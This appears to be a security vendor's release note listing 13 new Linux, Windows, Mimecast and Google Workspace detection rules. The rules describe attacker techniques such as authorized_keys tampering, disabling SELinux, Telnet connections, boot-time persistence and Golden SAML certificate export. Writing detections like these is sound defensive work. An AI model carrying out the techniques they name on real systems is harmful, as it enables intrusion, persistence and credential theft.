Release 8 - Out-of-the-box alerts
- Former user (Deleted)
Our October release brings more alerts across various technologies. This release adds a total of 13 new Linux, Mimecast, and Google Workplace out-of-the-box detections. For our upcoming releases we will continue to take a closer look at some of our more “noisy” alerts and tune them to help with our performance.
Devo is committed to providing high quality alerts for all customer environments, we will continue to deliver these out-of-the-box detections during the next release. This upcoming release will focus on improving the existing alerts and we will continue to expand our library of alerts through new technologies and more Mitre tactics.
Alert Analyzed/Updated:
Detection name | Changes made |
SecOpsFWSMBTrafficOutbound | Updated to the newest alert template to help it install easily through SecOps Content Manager |
Details on the new detections released can be seen below:
Detection name | Detection description | Devo table/Data source/Category |
SecOpsLinuxSshAuthKeyModification | Detects modifications made to the Secure Shell authorized_keys file. This file contains a list of public keys that are authorized to log in to a server. | box.unix |
SecOpsLinuxPotentialDisableSELinux | Potential attempt to disable Security-Enhanced Linux (SELinux) | box.unix |
SecOpsLinuxIntNetworkviaTelnet | Detects connections to an internal network via Telnet. | box.unix |
SecOpsLinuxExtNetworkviaTelnet | Detects connections to an external network via Telnet. | box.unix |
SecOpsLinuxSvcFileCreated | Detects suspicious file creation in the systemd directory. | box.unix |
SecOpsLinuxAppendCommandToProfileConfig | Detects command-line functions that relate to modifying user account files to run scripts on machine reboot. | box.unix |
SecOpsLinuxHighFileDeletesEtc | Detects high frequency of file deletion within a small timeframe. | box.unix |
SecOpsLinuxFileCreateInitBoot | Detects file creation in init system directories. File creation in these directories can be used for script execution on machine boot. | box.unix |
SecOpsLinuxDeletionofService | Detects deletion of services on a Linux machine. | box.unix |
SecOpsWinGoldenSamlCertificateExport | Detects for potential certificate export to bypass authentication mechanisms. | box.all.win |
SecOpsMimecastMessageWithHighSpamScore | Adversaries may send spearphishing emails with malicious attachments in an attempt to gain access to victim systems. | mail.mimecast.siem.receipt |
SecOpsMimecastMessageWithVirusDetections | Adversaries may send spearphishing emails with malicious attachments in an attempt to gain access to victim systems. | mail.mimecast.siem.av |
SecOpsGSuiteDriveSuspiciousSharedFileName | Adversaries may send Spear Phishing emails with a malicious attachment or share malicious files by cloud storage services in an attempt to gain access to victim systems. | cloud.gsuite.reports.drive |